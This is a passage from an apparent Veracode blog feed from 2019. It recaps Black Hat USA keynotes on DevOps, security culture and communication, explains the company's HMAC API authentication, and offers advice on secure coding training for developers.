continuously refine security strategy - essentially all the time red teaming. You have the ability to automate the toil, or the manual, repetitive, tactical work that doesn't provide enduring value," she said.</p> <h4><strong>How to Marry DevOps and Security</strong></h4> <p>At the end of the talk, Forsgren offered these tenants for a scalable love between DevOps and Security:</p> <ol> <li>Sit in on early design decisions and demos ??? but say ???No, and??ヲ??? vs. ???No.???</li> <li>Provide input on tests so every testing suite has InfoSec???s stamp on it.</li> <li>By the last ???no??? gate in the delivery process, nearly all issues will be fixed.</li> <li>InfoSec should focus on outcomes that are aligned with business goals.</li> <li>Time To Remediate (TTR) should become the preliminary anchor of your security metrics.</li> <li>Security- and performance-related gamedays can???t be separate species.</li> <li>Cultivate buy-in together for resilience and chaos engineering.</li> <li>Visibility/observability: collecting system information is essential.</li> <li>Your DevOps colleagues are likely already collecting the data you need - work with them to collect it.</li> <li>Changing culture: change what people do, not what they think.</li> </ol> <p>Forsgren and Shortridge made the case that security cannot force itself into DevOps, it must marry it - and have an equal partnership. Chaos/resilience are natural homes for InfoSec and represent its future, and InfoSec will need to evolve to unify responsibility and accountability.</p> <p>"If not, InfoSec will sit at the kids??? table until it is uninvited from the business," Shortridge said. "Giving up control isn???t a harbinger of doom. Resilience is a beacon of hope."</p> <p>Stay tuned for more from Black Hat ??ヲ</p> Thu, 08 Aug 2019 14:04:48 -0400 (lpaine) ver42691 Live From Black Hat USA: Four Key Takeaways from Dino Dai Zovi's Keynote <img src="/sites/default/files/styles/resize_960/public/BH-1-LP_0.png?itok=xt3exeiT" width="960" height="480" typeof="foaf:Image" /><p>"Did you know that your 20th Black Hat is when you get to give the keynote at Black Hat?" Dino Dai Zovi, head of security for Cash App at Square, joked to the packed ballroom. While it may have been Dai Zovi's 20th conference, the topic of his keynote has never been more fitting for where we are in security and the ways in which it mirrors what we experience in our day-to-day life.</p> <p>He gave us an overview of his history: in high school he realized that hacking and security was a lot more like magic than he previously thought, because it was about figuring out how things work, putting a lot of thought into writing and making something respond in the way you want it to. In college, he spent his nights, weekends, and spring breaks learning how to find and exploit vulnerabilities in code. And about that time (in 2007) he used his skills to simultaneously prove that Apple's OS X operating system could, indeed, be hacked and win a laptop for his friend in the <a href="">Pwn2Own competition</a>. &nbsp;</p> <p>No big deal.</p> <p>Dai Zovi took his work as a security researcher into more corporate organizations, where he learned about the importance of automation, understanding what is really being asked for in order to solve the right problem, and ensuring that there is collaboration between security and development to achieve more quality outcomes. Here are the four key lessons that Dai Zovi learned as he transitioned from offense to defense.</p> <p><strong>Work backwards from the job: </strong>Dai Zovi talked about how McDonald's was working to understand how they should evolve their milkshake. What they noticed was that people were ordering them in the morning, and they wanted to see why this was happening. In discussions with a customer, the customer indicated that they needed to have breakfast on their morning commute. They had tried a banana, but it wasn't filling enough; a bagel was too dry, and spreading cream cheese while driving was too challenging; in giving doughnuts a shot, they found they were eating too may; but the McDonald's milkshake - unlike other milkshakes - was thick enough to last the full 40 minute drive to work and left them feeling full. As it turns out, they customer was not ordering a milkshake to satisfy hunger, but to cure boredom. Really try to understand your customer, who they are and where they struggle, and what you need to do to provide the best product or solution for them.</p> <p><strong>Seek and apply leverage: </strong>For this story, Dai Zovi took us back to his time with @stake, where when he first started he was essentially fuzzing by hand. He wanted to show off his skills, but when he realized that his colleague was completing his work - and finding more vulnerabilities - faster than him (and subsequently honing his foosball game) by using an automated technique. So Dai Zovi followed his lead and found that he was able to find more and do it more effectively. By using feedback loops, software, and automation you can really scale your impact.</p> <p><strong>Culture is more powerful than strategy which is more powerful than tactics:</strong> In one of the organizations he worked in, Dai Zovi was in a conversation with a developer who had been working on a feature but noticed it was coming out??ヲa bit "sketchy." So the developer and security team white boarded out the feature and worked together to ensure that it was secure by design (shift left, anyone?). As security leaders, it's important that we focus on the security culture of our organizations. If we can create security culture change in every team, we can scale a lot more powerfully than we can if security is only security's responsibility.</p> <p><strong>Start with yes:</strong> We need to engage the world starting with yes. It keeps the conversation going, it keeps the conversation collaborative, and it keeps the conversation constructive. It says, "I want to work to solve the other problems you have, and I want to make you safe.??? That's how we create real change and have a real impact.</p> <p>"Why don't all security teams start with yes," Dai Zovi asked the audience. "Fear. There are lots of reasons to be afraid. But fear misguides us because it's irrational. Fear causes paralysis and creates more insecurity because it often leads to doing nothing."</p> <p>For me, this was the most powerful takeaway. Dai Zovi talked about how he overcame his fear of flying by learning how to skydive. He felt the fear center in his brain activate and assured it that he would be fine: he had the right equipment and knowledge and knew that he would land safely. The more he jumped, the more he proved to his brain that he was safe and the fear dissipated.</p> <p>Here is a truth about the human brain: we fear being rejected (or not belonging) and change above all else. There was a time when being outcast from the community meant certain death, and because change cannot be predicted, it cannot be planned for. As evolved as we have become, our brains have not kept up and we are all walking around with outdated technology that thinks that it should respond to change in the same way that it does being chased by a lion.</p> <p>Ultimately, if we want to strengthen communication we need to first understand that we're all human and assume good intent. Everyone wants to feel safe and they want to belong, and these two desires can stop progress in its tracks. Yet being agile and objective, communicative and collaborative, are essential in today's changing threat landscape. The reality is, we need more innovation and teamwork in development and security - not less. Change is both an inevitable part of life and keeping software safe - we must be agile in our thinking and in our actions.</p> <p>Stay tuned for more from Black Hat ??ヲ</p> Wed, 07 Aug 2019 17:10:00 -0400 (lpaine) ver42681 Live From Black Hat USA: Communication's Key Role in Security <img src="/sites/default/files/styles/resize_960/public/BH-2-LP.png?itok=U4MlKCnF" width="960" height="480" typeof="foaf:Image" /><p>The kick-off keynote for the 23rd Black Hat USA Conference in Las Vegas set the stage for the conversations that will undoubtedly be discussed in great detail over the next two days - and likely the next two years - if Black Hat founder Jeff Moss??? opening remarks are indicative of a trend. Moss pointed out that security had been asking for the spotlight, both in legislative and more corporate settings, and the industry has had it for the last two years. However, it isn't enough to have the spotlight if you don't know how to harness it. In this case, what Moss was talking about is that how we communicate determines the outcomes we receive. He quipped that if you communicate well, then you may find yourself with more budget - and if you communicate poorly, you could find yourself fired.</p> <p>Point taken.</p> <p>Yet defining what cyber or security is remains an ongoing challenge, and Moss notes that oftentimes the language that we use causes us to think of a problem in a certain way, taking us in a direction we don't really want to be heading. He notes that while cyber, or information, is considered the Fifth Domain, it doesn't mean that it is equal to land, sea, air, and space. It's different and requires a different language and level of thinking. You can't use the language and laws of the sea to govern the laws of the Internet or how we engage there, because it is vastly different in nature. It's also vastly different depending on where you're engaging, assuming the Internet isn't simply ??ヲ everywhere.</p> <p>Moss told a story about how he was speaking with a colleague who told him about how in China, the money is in DDoS protection because attackers are using the "Great Firewall of China" to blackmail other Chinese companies. They're not worried about identity theft because they don't really have it: Chinese farmers sell their identity for 3,000 yen. Meaning that "all of the identities are legit, they're just not the person you think they are."</p> <p>"You think might think the Internet works one way, and in one conversation it can flip upside down," Moss told the audience.</p> <p>Simply put: we all have our perceptions, either individually or collectively, about what is needed when it comes to cybersecurity - and we're not communicating effectively about them. In order to fix this problem, we need to reorder the way that we think about things so that we can have more open and effective dialogue. As Moss said, "communication is a soft skill that leads to better technical outcomes."</p> <p>Stay tuned for more from Black Hat ??ヲ</p> Wed, 07 Aug 2019 16:43:42 -0400 (lpaine) ver42676 Detailing Veracode’s HMAC API Authentication <img src="/sites/default/files/styles/resize_960/public/shutterstock_585626381%20%281%29.png?itok=iBA41Rqj" width="960" height="480" typeof="foaf:Image" /><p>Veracode???s RESTful APIs use Hash-based Message Authentication Code (HMAC) for authentication, which provides a significant security advantage over basic authentication methods that pass the username and password with every request. Passing credentials in the clear is not a recommended practice from a security perspective; encryption is definitely preferred for obvious reasons, but HMAC goes a step further and passes just a unique signature.&nbsp;</p> <p>Developers familiar with Amazon Web Services (AWS) may already have experience with this method of authentication, as it is the primary method used by AWS.&nbsp; In fact, Veracode began providing users the ability to use HMAC authentication when utilizing our suite of integration products and Java/C# SDKs in early 2016.</p> <h4><strong>What Is HMAC Authentication?</strong></h4> <p>With Hash-based Message Authentication Code (HMAC), the server and the client share a public ID and a private Secret Key (for more information on obtaining an ID and Secret Key with Veracode, please see our <a href="">help center</a>). &nbsp;Unlike a password with basic authentication, the Secret Key is known by the server and client, but is never transmitted.&nbsp; Rather than sending the Secret Key in the request, it is instead used in combination with a hash function to generate a unique HMAC signature, which is then combined with the public ID, a nonce, and additional information. &nbsp;The server ultimately receives the request and generates its own HMAC and compares the two ??? if equal, the request is executed (this process is referred to as the ???secret handshake???). &nbsp;Thus, the Secret Key is used in confirming authenticity and integrity of a request, but never transmitted in that request. &nbsp;For more information about HMAC, please visit&nbsp;<a href="">this link</a>.</p> <h4><strong>How Does HMAC Authentication Affect Me?</strong></h4> <p>HMAC provides significant security improvements when making API calls to Veracode.&nbsp; While more secure than basic authentication, additional steps are required to perform API calls using HMAC.&nbsp; Veracode does minimize and streamline the HMAC calculation to make this process simple and easy for users. In fact, there are several examples of HMAC authentication code or sample libraries available for your reference in the Veracode Help Center and on our&nbsp;<a href="">Github page</a>:</p> <ul> <li><a href="">Java</a></li> <li><a href="">C#/.NET</a></li> <li><a href="">Python</a>&nbsp;and&nbsp;<a href="">usage example</a></li> <li><a href="">NodeJS</a></li> <li><a href="">Go</a></li> </ul> <p>If you are looking to use curl or a similar command line tool to execute Veracode API calls, we recommend using<a href="">&nbsp;HTTPie with the Veracode Python Authentication Library</a>.</p> <p>If you have any questions about implementing HMAC and Veracode ID and Key, please post in the&nbsp;<a href="">Veracode Community Integrations Group</a>&nbsp; - if you haven???t yet, you are welcome to <a href="">join the community</a>!&nbsp;</p> Wed, 07 Aug 2019 13:33:02 -0400 (anielsen) ver42671 Grasshoppers, Dead Cow, and Controlled Chaos: What We’re Looking Forward to at Black Hat USA <img src="/sites/default/files/styles/resize_960/public/veracode-blackhat-2019-las-vegas-blog.png?itok=eswOylhY" width="960" height="480" typeof="foaf:Image" /><p>Usually, <a href="//">Black Hat USA </a>is all the rage this time of year when it comes to Las Vegas; however, it seems the excitement about the show has been eclipsed by a grasshopper invasion. I admit, I was puzzled when my colleagues informed me of the news and proceeded to show me the <a href="">horrifying photographic and video evidence</a>. I joked that I would need to wear a Veracode-branded beekeeper suit, and wondered what the symbolism of the grasshopper is. So before I get to what you really care about ??? Black Hat ??? I leave you with two fun facts:</p> <ol> <li>Upon asking my mother ??? a Las Vegas resident ??? about the grasshopper invasion, she informed me that this happens e<em>very year</em>, but it usually isn???t this bad. And that her side of town has significantly less grasshoppers.</li> <li>Grasshoppers can???t move sideways or backwards, they can only take big leaps forward. Seems apt when we???re considering the future of security and development. &nbsp;</li> </ol> <p>Without further ado, here are three events I???m most looking forward to attending at this year???s show:</p> <p><strong>Controlled Chaos: The Inevitable Marriage of DevOps &amp; Security</strong></p> <p>Kelly Shortridge, VP of Product Strategy at Capsule8, and Dr. Nicole Forsgren, Research &amp; Strategy at Google Cloud, will take a closer look at the choice information security has to make when it comes to DevOps: marry with their DevOps colleagues and embrace the philosophy of controlled chaos, or eventually lose the race, because software ??? secure software especially ??? is a competitive differentiator in today???s global economy. I???m curious to see Shortridge and Forsgren???s take on DevOps, the concepts of resilience and chaos engineering, and the impact on the future of security programs.</p> <p><strong>Where: </strong>South Pacific <strong>When:</strong> Aug. 7 from 4-4:50 p.m. <strong>Read More:</strong> <a href="">Here</a></p> <p><strong>All Things Cult of the Dead Cow</strong></p> <p>Remember when much of the nation was astonished to learn that presidential candidate Beto O???Rourke was a member of America???s oldest hacking group, The Cult of the Dead Cow (cDc)? This was after Reuters reporter Joseph Menn published <a href="">a special report</a> that was adapted from his book <em>Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World</em>. While I???ll be sure to check out <a href="">the briefing</a> at BHUSA, at Veracode, we???re excited to host a conversation with Menn, Chris Wysopal, Veracode's CTO, Christien Rioux, Software Architect at Flowmill, and Luke Benfey - Deth Veggie ??? cDc Minister of Propaganda, for a discussion about the new book at our booth. Plus, we???re donating $2 to <a href="">BuildOn</a> for every booth visit.</p> <p><strong>Where:</strong> Booth #854 <strong>When:</strong> Aug. 7 from 5-6:30 p.m. <strong>Read More:&nbsp;</strong><a href="//">Here</a></p> <p><strong>DevSecOps: What, Why and How</strong></p> <p>When it comes to development, security is often added towards the end of the DevOps cycle through a manual/automated review ??? but we know it doesn???t have to be that way. Security can actually be integrated ??? and automated ??? at each stage of the DevOps pipeline. In this briefing, Anant Shrivastava from NotSoSecure will dive into the technology and cultural aspects of DevSecOps, and the changes needed to get tangible benefits. Shrivastava will also present case studies on how critical bugs and security breaches affecting popular software and applications could have been prevented using a simple DevSecOps approach.</p> <p><strong>Where:</strong> South Pacific <strong>When:</strong> Aug. 8 from 11-11:50 a.m. <strong>Read More:&nbsp;</strong><a href="">Here</a></p> <p>We???d love to talk to you about your own development shop and security practices during the show, so please stop by Booth #854 ??? we???ve got demos, <a href="">spun chairs</a>, and we???ll send you home with a one-of-a-kind custom t-shirt.</p> <p>I???m not sure I???ll be able to score that branded beekeeper suit, but I???m looking forward to seeing everything Black Hat has to offer. If you???re open to sharing what you???re looking forward to at the show, let???s connected on Twitter (<a href="">@lauraleapaine</a>) so I can get your perspective. Make sure to check back here for live coverage ??? or <a href="">subscribe</a> to get our content updates sent directly to your inbox.</p> Fri, 02 Aug 2019 10:37:25 -0400 (lpaine) ver42461 Key Considerations for Secure Coding Training <img src="/sites/default/files/styles/resize_960/public/shutterstock_481480087.png?itok=uLsZ-InG" width="960" height="480" typeof="foaf:Image" /><p>Developer training has an essential role in reducing code vulnerabilities and avoiding a breach. Effective application security requires both locating security-related defects, and fixing them. But developers simply aren???t equipped with the knowledge or skills they need to fix these flaws. Veracode recently sponsored the&nbsp;<a href="//" target="_blank">2017 DevSecOps Global Skills Survey</a>&nbsp;from, and found that less than one in four developers or other IT pros were required to take a single college course on security. Meanwhile, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security. The good news is that getting developers the security training they need makes a big difference. Data collected for our <a href=""><em>State of Software Security</em> report</a> revealed that <a href="//">eLearning on secure coding</a> improved developer fix rates by 19 percent; even better, <a href="//">remediation coaching</a> improved fix rates by a whopping 88 percent.</p> <p>Clearly, developer training on secure coding is both needed and effective. The following are some key elements to keep in mind when establishing security-training initiatives for development teams.</p> <h4><strong>Consider the channel and the content</strong></h4> <p>Consider employing a variety of training types to accommodate different learning styles and preferences, time zone differences, and to allow for both quick insights and deep dives. For instance, consider both self-paced eLearning training along with periodic instructor-led training.</p> <p>In terms of content, ensure the training is both role- and technology-specific. For instance, different programming languages have different security idiosyncrasies, and each has its own propensity for different vulnerability types, so it???s important that your training is specific to your language.</p> <h4><strong>Train on-the-job </strong></h4> <p>Reinforce traditional training with on-the-job learning. When developers get instant feedback and learn to code securely as they are actively coding, they create more secure code faster and make less security missteps going forward. And some application security testing solutions offer this option. As our director of product marketing notes in a <a href="//">recent blog post</a>, ???The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production.???</p> <p>A recent Forrester report, <a href=""><em>Show, Don't Tell, Your Developers How To Write Secure Code</em></a>, states that ???the best application security testing tools ??ヲ now come with good remediation advice for developers.??? They recommend to ???look for tools that include clickable and brief training modules and can be inserted as early into the SDLC as possible, such as spellchecker-like plug-ins to the integrated developer environment (IDE).???</p> <p>For example, <a href="//">Veracode Greenlight</a>, an IDE or CI integrated continuous flaw feedback and secure coding education solution, returns scans in seconds, helping you answer the question ???is my code secure????</p> <p>Greenlight provides on-the-job developer security training through:</p> <ul> <li>Remediation advice with code examples</li> <li>Positive feedback when best practices are followed</li> <li>In line education, learning as you code</li> </ul> <h4><strong>Embrace security champions</strong></h4> <p>Finally, one of the best ways to reinforce all your security training efforts is to employ <a href="//">security champions</a> on your development teams. A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don???t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either ?ャ?x the issues in development or call in your organization???s security experts to provide guidance.</p> <p>With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.</p> <h4><strong>Learn more</strong></h4> <p>Get details on additional application security best practices in our new <a href=""><em>Application Security Best Practices Handbook</em></a>.</p> <p>And get tips and tricks on managing your AppSec program from other Veracode customers in our <a href="">Community</a>.</p> Wed, 31 Jul 2019 10:01:56 -0400 (sciccone) ver42421